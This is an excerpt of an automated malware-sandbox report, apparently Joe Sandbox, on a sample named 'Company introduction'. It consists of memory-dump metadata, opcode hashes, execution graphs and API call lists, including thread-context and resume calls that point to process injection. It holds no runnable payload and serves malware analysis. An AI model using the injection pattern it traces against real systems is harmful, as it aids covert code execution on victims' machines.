                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d9f133716e3b8d2934e9702710f6532ca295d48ecf2d37a2ad3943655436882
                                                                                                                                                    • Instruction ID: 3f919201f9884776bcbfd43683ba78d08f8d906397dd81ba26a3a596b3e4771f
                                                                                                                                                    • Opcode Fuzzy Hash: 4d9f133716e3b8d2934e9702710f6532ca295d48ecf2d37a2ad3943655436882
                                                                                                                                                    • Instruction Fuzzy Hash: DE112D74D0424A9FCB02CFA8E844AAEFBB1FB49304F008066D914A3351E7785A56DF92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e67d061ae42976cae0990ae593008308946446ba7fcb0a2accd86fbd092d11ec
                                                                                                                                                    • Instruction ID: 790f0277bc7db7d3419627e52bff794beb61c191de873edd65dc5f361d2d1309
                                                                                                                                                    • Opcode Fuzzy Hash: e67d061ae42976cae0990ae593008308946446ba7fcb0a2accd86fbd092d11ec
                                                                                                                                                    • Instruction Fuzzy Hash: 43F02B317002184B97266B2ED454A2AFBFEFFC8AA53494479E90DC7361EE21CC038380
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d179f2309f212492f66ab154d82f1c55a5d4c956ff2bec9f657dfbf0187cea4
                                                                                                                                                    • Instruction ID: fdca9262ceea53e2a7b116b9356e636c0f731f59ef4fd837d005de9e749c1a38
                                                                                                                                                    • Opcode Fuzzy Hash: 9d179f2309f212492f66ab154d82f1c55a5d4c956ff2bec9f657dfbf0187cea4
                                                                                                                                                    • Instruction Fuzzy Hash: EBF090329041989FCB02DB69D894AEABFB1EF8A224F0581A6E558C7261D3314955CB51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 86164962d3255831a345fc5504fd57463281efcdfb74599efa8be355ca8125ef
                                                                                                                                                    • Instruction ID: 137dcb63e77fe13e5bb8e28dd59743a04a131f87e3d5a94ce1a67261619e8880
                                                                                                                                                    • Opcode Fuzzy Hash: 86164962d3255831a345fc5504fd57463281efcdfb74599efa8be355ca8125ef
                                                                                                                                                    • Instruction Fuzzy Hash: DBE0DF32E543268BCB01EBB0EC400EEB734AE82261B48855BC0A437190EB306219C792
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID: \;^q$\;^q$\;^q$\;^q
• API String ID: 0-3001612457

Execution Graph

Execution Coverage: 9.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 91
Total number of Limit Nodes: 8

Execution graph (node listing omitted). API calls appearing in the graph nodes: DuplicateHandle, KiUserCallbackDispatcher, CreateActCtxA, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetModuleHandleW, CreateIconFromResourceEx, Wow64SetThreadContext, ResumeThread.

Control-flow Graph

Control-flow graph (executed / not-executed node rendering omitted) for the function at dbe800-dbe9cd, which calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess and GetCurrentThreadId.
APIs
• GetCurrentProcess.KERNEL32 ref: 00DBE87E
• GetCurrentThread.KERNEL32 ref: 00DBE8BB
• GetCurrentProcess.KERNEL32 ref: 00DBE8F8
• GetCurrentThreadId.KERNEL32 ref: 00DBE951
Memory Dump Source
• Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph

Control-flow graph (executed / not-executed node rendering omitted) for the function at db5d77-db5ee9, which calls CreateActCtxA.
APIs
• CreateActCtxA.KERNEL32(?), ref: 00DB5E51
Memory Dump Source
• Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• CreateActCtxA.KERNEL32(?), ref: 00DB5E51
Memory Dump Source
• Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• CreateActCtxA.KERNEL32(?), ref: 00DB5E51
Memory Dump Source
• Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
Memory Dump Source
• Source File: 00000007.00000002.1756807740.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2940000_FzXKnGk.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EEFD6E
Memory Dump Source
• Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EEFD6E
Memory Dump Source
• Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DBEACF
Memory Dump Source
• Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,02948FA2,?,?,?,?,?), ref: 02949047
Memory Dump Source
• Source File: 00000007.00000002.1756807740.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2940000_FzXKnGk.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
APIs
• KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DBB0E5
Memory Dump Source
• Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,02948FA2,?,?,?,?,?), ref: 02949047
Memory Dump Source
• Source File: 00000007.00000002.1756807740.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2940000_FzXKnGk.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00DBC7C6
Memory Dump Source
• Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Memory Dump Source
• Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                    • Opcode ID: f6129b5f0e7846edc207f5b7fff331cc26b003ac434ed4bb20c753088b20f6f7
                                                                                                                                                    • Instruction ID: f12d98b13036cae271ea01097133a522c4cf65f18a83803dd0f0055a4f1f6794
                                                                                                                                                    • Opcode Fuzzy Hash: f6129b5f0e7846edc207f5b7fff331cc26b003ac434ed4bb20c753088b20f6f7
                                                                                                                                                    • Instruction Fuzzy Hash: BA21DE71604200EFDB05DF14DAC0B26BBB5FF88354F24C6ADE95E5B296C33AD846CA61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5a70a90b419e2040094592f9fabf4e2e31e3fc1bd17fcde73150b253cda88e74
                                                                                                                                                    • Instruction ID: b78f153ab42f09a5988fe84574d8018e1957be498cd11fa86bc777d7c41c4f42
                                                                                                                                                    • Opcode Fuzzy Hash: 5a70a90b419e2040094592f9fabf4e2e31e3fc1bd17fcde73150b253cda88e74
                                                                                                                                                    • Instruction Fuzzy Hash: 4A21FF75604200DFCB14DF24D9D4B26BBB5EF88354F24C6ADE81E4B296C33AD847CA61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e34bae87a81065c860780fb4b238552049ab9bfcc9c561bb45d0308d4a521bd6
                                                                                                                                                    • Instruction ID: e0866d7e361e9dacc0357a2d5e1a33556034328d73ae2bbb19d97560d4642b49
                                                                                                                                                    • Opcode Fuzzy Hash: e34bae87a81065c860780fb4b238552049ab9bfcc9c561bb45d0308d4a521bd6
                                                                                                                                                    • Instruction Fuzzy Hash: AA2162755083809FDB02CF14D994B15BFB1EF56314F28C5DAD8498F2A7C33A985ACB62
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                    • Instruction ID: f25a1d535cae568abd5238d8e73a4a17b0bf7dce26fdb0eb6eedc912c162f1f4
                                                                                                                                                    • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                    • Instruction Fuzzy Hash: 4D21CD76904240CFCB06CF00D9C4B16BFA2FB84314F24C2A9DC080A256C33AD82ACBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755105355.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b6d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction ID: a3c197a92498d1e3d04050ee2b29a5036dca18edb75197380e939a8679be06bb
                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 8411D676904280CFCB15CF14D5C4B16BFB1FBA4314F24C5AAD9450B656C33AD456CB91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755180971.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_b7d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: 9dfc53ed878357093b1ec5124443be2e0bb1a842c6d50a2afe7ef01a1b30c0cf
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: 53117975504280DFDB16CF14D5C4B15BBB1FB84314F28C6AAD8494B696C33AD84ACB61

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:19.4%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:16
                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                    execution_graph 18813 183e018 18814 183e024 18813->18814 18817 6f62968 18814->18817 18815 183e0c3 18818 6f6298a 18817->18818 18819 6f62a56 18818->18819 18822 6f6992c 18818->18822 18826 6f69548 18818->18826 18819->18815 18823 6f697e3 18822->18823 18824 6f69a69 LdrInitializeThunk 18823->18824 18825 6f69a81 18824->18825 18825->18819 18827 6f6957e LdrInitializeThunk 18826->18827 18828 6f69579 18826->18828 18831 6f69619 18827->18831 18828->18827 18829 6f696d9 18829->18819 18830 6f69a69 LdrInitializeThunk 18830->18829 18831->18829 18831->18830
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                                                    • API String ID: 0-183542557
                                                                                                                                                    • Opcode ID: bc6f2d7887f457c7967f58e15a1d5f8dd67e6708da11b35ae79b5122606ce646
                                                                                                                                                    • Instruction ID: 2020121392d32415ac2269d96a6ffc4d18f94bf4a0a89d396758a71050f276a3
                                                                                                                                                    • Opcode Fuzzy Hash: bc6f2d7887f457c7967f58e15a1d5f8dd67e6708da11b35ae79b5122606ce646
                                                                                                                                                    • Instruction Fuzzy Hash: 11A29031A00209CFCB19CFA8C584AAEBBF6FF88310F198569E545DB265D735EE41CB91

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 587 1836fc8-1836ffe 588 1837006-183700c 587->588 713 1837000 call 18369a0 587->713 714 1837000 call 1837118 587->714 715 1837000 call 1836fc8 587->715 589 183700e-1837012 588->589 590 183705c-1837060 588->590 593 1837021-1837028 589->593 594 1837014-1837019 589->594 591 1837062-1837071 590->591 592 1837077-183708b 590->592 595 1837073-1837075 591->595 596 183709d-18370a7 591->596 597 1837093-183709a 592->597 716 183708d call 1839dd0 592->716 717 183708d call 1839de0 592->717 718 183708d call 183a0e8 592->718 598 18370fe-183713b 593->598 599 183702e-1837035 593->599 594->593 595->597 600 18370b1-18370b5 596->600 601 18370a9-18370af 596->601 609 1837146-1837166 598->609 610 183713d-1837143 598->610 599->590 602 1837037-183703b 599->602 605 18370bd-18370f7 600->605 607 18370b7 600->607 601->605 603 183704a-1837051 602->603 604 183703d-1837042 602->604 603->598 608 1837057-183705a 603->608 604->603 605->598 607->605 608->597 616 1837168 609->616 617 183716d-1837174 609->617 610->609 619 18374fc-1837505 616->619 618 1837176-1837181 617->618 620 1837187-183719a 618->620 621 183750d-1837519 618->621 626 18371b0-18371cb 620->626 627 183719c-18371aa 620->627 628 183751b-1837521 621->628 629 183749e-18374a4 621->629 639 18371ef-18371f2 626->639 640 18371cd-18371d3 626->640 627->626 638 1837484-183748b 627->638 630 18374a6-18374ab 628->630 631 1837523-1837536 628->631 629->621 629->630 632 18374f0-18374f3 630->632 633 18374ad-18374b2 630->633 637 1837508 632->637 641 18374f5-18374fa 632->641 636 18374b4 633->636 633->637 645 18374bb-18374c0 636->645 637->621 638->619 642 183748d-183748f 638->642 643 18371f8-18371fb 639->643 644 183734c-1837352 639->644 646 18371d5 640->646 647 18371dc-18371df 640->647 641->619 641->642 642->629 654 1837491-1837496 642->654 643->644 650 1837201-1837207 643->650 648 
1837358-183735d 644->648 649 183743e-1837441 644->649 651 18374e2-18374e4 645->651 652 18374c2-18374c4 645->652 646->644 646->647 646->649 653 1837212-1837218 646->653 647->653 655 18371e1-18371e4 647->655 648->649 649->637 657 1837447-183744d 649->657 650->644 656 183720d 650->656 651->637 662 18374e6-18374e9 651->662 660 18374d3-18374d9 652->660 661 18374c6-18374cb 652->661 658 183721a-183721c 653->658 659 183721e-1837220 653->659 654->629 663 18371ea 655->663 664 183727e-1837284 655->664 656->649 666 1837472-1837476 657->666 667 183744f-1837457 657->667 668 183722a-1837233 658->668 659->668 660->621 669 18374db-18374e0 660->669 661->660 662->632 663->649 664->649 665 183728a-1837290 664->665 670 1837292-1837294 665->670 671 1837296-1837298 665->671 666->638 675 1837478-183747e 666->675 667->621 672 183745d-183746c 667->672 673 1837246-183726e 668->673 674 1837235-1837240 668->674 669->651 676 18374b6-18374b9 669->676 677 18372a2-18372b9 670->677 671->677 672->626 672->666 688 1837362-1837398 673->688 689 1837274-1837279 673->689 674->649 674->673 675->618 675->638 676->637 676->645 683 18372e4-183730b 677->683 684 18372bb-18372d4 677->684 683->637 694 1837311-1837314 683->694 684->688 692 18372da-18372df 684->692 695 18373a5-18373ad 688->695 696 183739a-183739e 688->696 689->688 692->688 694->637 697 183731a-1837343 694->697 695->637 700 18373b3-18373b8 695->700 698 18373a0-18373a3 696->698 699 18373bd-18373c1 696->699 697->688 712 1837345-183734a 697->712 698->695 698->699 701 18373c3-18373c9 699->701 702 18373e0-18373e4 699->702 700->649 701->702 704 18373cb-18373d3 701->704 705 18373e6-18373ec 702->705 706 18373ee-183740d call 18376f1 702->706 704->637 707 18373d9-18373de 704->707 705->706 709 1837413-1837417 705->709 706->709 707->649 709->649 710 1837419-1837435 709->710 710->649 712->688 713->588 714->588 715->588 716->597 717->597 718->597
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                    • API String ID: 0-879173519
                                                                                                                                                    • Opcode ID: cda97ea93c88b8d2a275303a3b3ba1038c2c2090f070d7439a4c9d78dac276ea
                                                                                                                                                    • Instruction ID: d79cf746a02be6ea2929d23454d96297802c9702b8321619194ce07e8c0b7cd3
                                                                                                                                                    • Opcode Fuzzy Hash: cda97ea93c88b8d2a275303a3b3ba1038c2c2090f070d7439a4c9d78dac276ea
                                                                                                                                                    • Instruction Fuzzy Hash: A5024FB1A00219DFDB15CF68C884AADBBB6FF88304F598465E905EB261D734EE41CF91

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1780 6f69548-6f69577 1781 6f6957e-6f69614 LdrInitializeThunk 1780->1781 1782 6f69579 1780->1782 1783 6f696b3-6f696b9 1781->1783 1782->1781 1784 6f696bf-6f696d7 1783->1784 1785 6f69619-6f6962c 1783->1785 1786 6f696eb-6f696fe 1784->1786 1787 6f696d9-6f696e6 1784->1787 1788 6f69633-6f69684 1785->1788 1789 6f6962e 1785->1789 1791 6f69705-6f69721 1786->1791 1792 6f69700 1786->1792 1790 6f69a81-6f69b7e 1787->1790 1805 6f69686-6f69694 1788->1805 1806 6f69697-6f696a9 1788->1806 1789->1788 1797 6f69b86-6f69b90 1790->1797 1798 6f69b80-6f69b85 1790->1798 1794 6f69723 1791->1794 1795 6f69728-6f6974c 1791->1795 1792->1791 1794->1795 1801 6f69753-6f69785 1795->1801 1802 6f6974e 1795->1802 1798->1797 1811 6f69787 1801->1811 1812 6f6978c-6f697ce 1801->1812 1802->1801 1805->1784 1808 6f696b0 1806->1808 1809 6f696ab 1806->1809 1808->1783 1809->1808 1811->1812 1814 6f697d5-6f697de 1812->1814 1815 6f697d0 1812->1815 1816 6f69a06-6f69a0c 1814->1816 1815->1814 1817 6f69a12-6f69a25 1816->1817 1818 6f697e3-6f69808 1816->1818 1821 6f69a27 1817->1821 1822 6f69a2c-6f69a47 1817->1822 1819 6f6980f-6f69846 1818->1819 1820 6f6980a 1818->1820 1830 6f6984d-6f6987f 1819->1830 1831 6f69848 1819->1831 1820->1819 1821->1822 1823 6f69a4e-6f69a62 1822->1823 1824 6f69a49 1822->1824 1828 6f69a64 1823->1828 1829 6f69a69-6f69a7f LdrInitializeThunk 1823->1829 1824->1823 1828->1829 1829->1790 1833 6f698e3-6f698f6 1830->1833 1834 6f69881-6f698a6 1830->1834 1831->1830 1837 6f698fd-6f69922 1833->1837 1838 6f698f8 1833->1838 1835 6f698ad-6f698db 1834->1835 1836 6f698a8 1834->1836 1835->1833 1836->1835 1841 6f69924-6f69925 1837->1841 1842 6f69931-6f69969 1837->1842 1838->1837 1841->1817 1843 6f69970-6f699d1 call 6f69328 1842->1843 1844 6f6996b 1842->1844 1850 6f699d3 1843->1850 1851 6f699d8-6f699fc 1843->1851 1844->1843 1850->1851 1854 6f69a03 
1851->1854 1855 6f699fe 1851->1855 1854->1816 1855->1854
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2957026234.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_6f60000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8f373c173e2656d5caba6e5b7b441a0157f1e43f2c911de9c6b4fe0db18c4f73
                                                                                                                                                    • Instruction ID: c06d646a4e68c2d6d207510768ccf4e784f7e87842287ec60d0d0bbc6fd7ec18
                                                                                                                                                    • Opcode Fuzzy Hash: 8f373c173e2656d5caba6e5b7b441a0157f1e43f2c911de9c6b4fe0db18c4f73
                                                                                                                                                    • Instruction Fuzzy Hash: AFF1F174E01219CFDB54CFA9D884B9DBBB2FF88304F5481A9E808AB355DB70A985CF50
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID: (o^q$Hbq
• API String ID: 0-662517225
• Opcode ID: 0b2a44730d27b0e70c46f1f7a604945c13281981fd76428f2aea044f0ef949c4
• Instruction ID: ef2d5f7c40d0f50ee0e02eec4407f90669791239dd3dbb8035ba47a996acafd3
• Opcode Fuzzy Hash: 0b2a44730d27b0e70c46f1f7a604945c13281981fd76428f2aea044f0ef949c4
• Instruction Fuzzy Hash: E4127B70A002199FDB15DF69C894AAEBBF6FFC8300F248569E505DB395EB349E41CB90

